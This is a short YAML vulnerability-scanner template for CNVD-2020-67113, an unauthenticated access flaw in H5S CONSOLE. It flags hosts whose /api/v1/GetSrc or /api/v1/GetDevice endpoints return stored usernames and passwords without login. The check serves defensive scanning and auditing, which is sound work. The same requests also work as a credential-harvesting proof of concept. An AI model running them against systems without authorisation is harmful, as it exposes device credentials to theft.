id: CNVD-2020-67113

info:
    name: H5S CONSOLE 存在未授权访问
    author: iak3ec(https://github.com/nu0l)
    severity: high

rules:
  h5s1:
    request:
      method: GET
      path: /api/v1/GetSrc
    expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"H5_AUTO") && response.body.bcontains(b"strUser") && response.body.bcontains(b"strPasswd")
  h5s2:
    request:
      method: GET
      path: /api/v1/GetDevice
    expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"H5_DEV") && response.body.bcontains(b"strUser") && response.body.bcontains(b"strPasswd")
expression: h5s1() || h5s2()

